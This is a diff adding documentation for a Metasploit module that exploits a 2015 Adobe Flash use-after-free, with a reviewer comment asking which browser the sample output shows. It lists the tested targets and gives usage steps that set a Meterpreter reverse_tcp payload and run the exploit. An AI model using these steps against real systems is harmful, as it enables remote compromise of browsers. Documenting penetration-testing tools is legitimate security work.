documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md

```diff
@@ -0,0 +1,62 @@
+## Description
+
+This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on:
+1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194.
+2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194.
+3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194.
+4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194.
+5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf```
+2. Do: ```set payload windows/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Sample Output
+
```

Comment:
last change, can you add what browser is shown being exploited here? I see win7 sp1 32bit but not sure if its IE or FF.
If you can add that, it'll be good to go.

example: 
```
### IE11 and Adobe Flash 18.0.0.194
```